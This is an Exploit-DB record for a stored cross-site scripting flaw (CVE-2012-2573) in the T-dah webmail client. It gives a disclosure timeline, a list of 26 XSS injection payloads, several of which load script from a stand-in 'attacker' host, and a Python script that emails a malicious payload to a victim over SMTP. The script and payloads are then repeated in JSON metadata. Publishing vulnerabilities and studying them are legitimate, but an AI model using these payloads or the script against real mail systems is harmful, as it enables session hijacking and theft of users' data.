ID EDB-ID:20364Type exploitdbReporter loneferretModified 2012-08-08T00:00:00
Description
t-dah webmail client 3.2.0-2.3 - Stored XSS. CVE-2012-2573. Webapps exploit for php platform
#!/usr/bin/python
'''
Author: loneferret of Offensive Security
Product: T-dah Webmail Client
Version: 3.2.0-2.3
Vendor Site: http://t-dahmail.sourceforge.net/index.php
Software Download: http://sourceforge.net/projects/t-dahmail/
Contact: http://t-dahmail.sourceforge.net/forum/
Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure
Installed On: Ubuntu Server LAMP 11.10
Client Test OS: Windows 7 Pro (x86) SP1
Browser Used: Internet Explorer 9
Injection Point: Body
Injection Payload(s):
1: <SCRIPT SRC=http://attacker/xss.js></SCRIPT>
2: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
3: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
4: <SCRIPT>alert('XSS')</SCRIPT>
5: exp/*<XSS STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
6: <BODY ONLOAD=alert('XSS')>
7: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
8: <DIV STYLE="width: expression(alert('XSS'));">
9: <XSS STYLE="xss:expression(alert('XSS'))">
10: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
11: <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
12: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
13: <!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]--
14: <SCRIPT SRC="http://attacker/xss.jpg"></SCRIPT>
15: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT>
16: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
17: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT>
18: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT>
19: <<SCRIPT>alert("XSS");//<</SCRIPT>
20: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
21: <SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
22: <SCRIPT a=`>` SRC="http://attacker/xss.js"></SCRIPT>
23: <SCRIPT a="blah" '' SRC="http://attacker/xss.js"></SCRIPT>
24: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT>
25: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT>
26: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT>
'''
import smtplib, urllib2
payload = """<SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT>"""
def sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = "From: hacker@offsec.local\n"
msg += "To: victim@victim.local\n"
msg += 'Date: Today\r\n'
msg += "Subject: XSS\n"
msg += "Content-type: text/html\n\n"
msg += "XSS" + payload + "\r\n\r\n"
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print "[-] Failed to send email:"
print "[*] " + str(e)
server.quit()
username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv = "172.16.84.171"
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)
{"published": "2012-08-08T00:00:00", "id": "EDB-ID:20364", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "history": [], "enchantments": {"vulnersScore": 5.0}, "hash": "0013f98f1ac214b4bd45215da55d36ecc54f8939d3edcacb5e63f2827382db52", "description": "t-dah webmail client 3.2.0-2.3 - Stored XSS. CVE-2012-2573. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/20364/", "lastseen": "2016-02-02T14:05:06", "edition": 1, "title": "t-dah webmail client 3.2.0-2.3 - Stored XSS", "osvdbidlist": ["84694"], "modified": "2012-08-08T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2573"], "sourceHref": "https://www.exploit-db.com/download/20364/", "references": [], "reporter": "loneferret", "sourceData": "#!/usr/bin/python\r\n\r\n'''\r\n\r\nAuthor: loneferret of Offensive Security\r\nProduct: T-dah Webmail Client\r\nVersion: 3.2.0-2.3\r\nVendor Site: http://t-dahmail.sourceforge.net/index.php\r\nSoftware Download: http://sourceforge.net/projects/t-dahmail/\r\nContact: http://t-dahmail.sourceforge.net/forum/\r\n\r\nTimeline:\r\n29 May 2012: Vulnerability reported to CERT\r\n30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012\r\n23 Jul 2012: Update from CERT: No response from vendor\r\n08 Aug 2012: Public Disclosure\r\n\r\nInstalled On: Ubuntu Server LAMP 11.10\r\nClient Test OS: Windows 7 Pro (x86) SP1\r\nBrowser Used: Internet Explorer 9\r\n\r\nInjection Point: Body\r\nInjection Payload(s):\r\n1: <SCRIPT SRC=http://attacker/xss.js></SCRIPT> \r\n2: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\r\n3: ';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} \r\n4: <SCRIPT>alert('XSS')</SCRIPT> \r\n5: exp/*<XSS STYLE='no\\xss:noxss(\"*//*\");\r\nxss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'> \r\n6: <BODY ONLOAD=alert('XSS')> \r\n7: <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\r\n8: <DIV STYLE=\"width: expression(alert('XSS'));\">\r\n9: <XSS STYLE=\"xss:expression(alert('XSS'))\">\r\n10: <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\r\n11: <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> \r\n12: <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"> \r\n13: <!--[if gte IE 4]>\r\n<SCRIPT>alert('XSS');</SCRIPT>\r\n<![endif]--\r\n14: <SCRIPT SRC=\"http://attacker/xss.jpg\"></SCRIPT> \r\n15: <SCRIPT/XSS SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n16: </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT> \r\n17: <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n18: <SCRIPT a=\">'>\" SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n19: <<SCRIPT>alert(\"XSS\");//<</SCRIPT>\r\n20: <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"> \r\n21: <SCRIPT>a=/XSS/\r\nalert(a.source)</SCRIPT> \r\n22: <SCRIPT a=`>` SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n23: <SCRIPT a=\"blah\" '' SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n24: <SCRIPT \"a='>'\" SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n25: <SCRIPT =\"blah\" SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n26: <SCRIPT a=\">\" SRC=\"http://attacker/xss.js\"></SCRIPT>\r\n\r\n'''\r\n\r\n\r\nimport smtplib, urllib2\r\n \r\npayload = \"\"\"<SCRIPT/XSS SRC=\"http://attacker/xss.js\"></SCRIPT>\"\"\"\r\n \r\ndef sendMail(dstemail, frmemail, smtpsrv, username, password):\r\n msg = \"From: hacker@offsec.local\\n\"\r\n msg += \"To: victim@victim.local\\n\"\r\n msg += 'Date: Today\\r\\n'\r\n msg += \"Subject: XSS\\n\"\r\n msg += \"Content-type: text/html\\n\\n\"\r\n msg += \"XSS\" + payload + \"\\r\\n\\r\\n\"\r\n server = smtplib.SMTP(smtpsrv)\r\n server.login(username,password)\r\n try:\r\n server.sendmail(frmemail, dstemail, msg)\r\n except Exception, e:\r\n print \"[-] Failed to send email:\"\r\n print \"[*] \" + str(e)\r\n server.quit()\r\n \r\nusername = \"hacker@offsec.local\"\r\npassword = \"123456\"\r\ndstemail = \"victim@victim.local\"\r\nfrmemail = \"hacker@offsec.local\"\r\nsmtpsrv = \"172.16.84.171\"\r\n \r\nprint \"[*] Sending Email\"\r\nsendMail(dstemail, frmemail, smtpsrv, username, password)\r\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2012-2573", "type": "cve", "title": "CVE-2012-2573", "description": "Multiple cross-site scripting (XSS) vulnerabilities in T-dah WebMail 3.2.0-2.3 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a SCRIPT element, (2) a crafted Cascading Style Sheets (CSS) expression property, (3) a CSS expression property in the STYLE attribute of an arbitrary element, (4) an ONLOAD attribute of a BODY element, (5) a crafted SRC attribute of an IFRAME element, (6) a crafted CONTENT attribute of an HTTP-EQUIV=\"refresh\" META element, or (7) a data: URL in the CONTENT attribute of an HTTP-EQUIV=\"refresh\" META element.", "published": "2012-08-12T17:55:01", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2573", "cvelist": ["CVE-2012-2573"], "lastseen": "2016-09-03T16:38:53"}], "exploitdb": [{"id": "EDB-ID:20579", "type": "exploitdb", "title": "T-dah Webmail Multiple Stored XSS", "description": "T-dah Webmail Multiple Stored XSS. CVE-2012-2573. Webapps exploit for php platform", "published": "2012-08-17T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/20579/", "cvelist": ["CVE-2012-2573"], "lastseen": "2016-02-02T14:33:47"}]}}
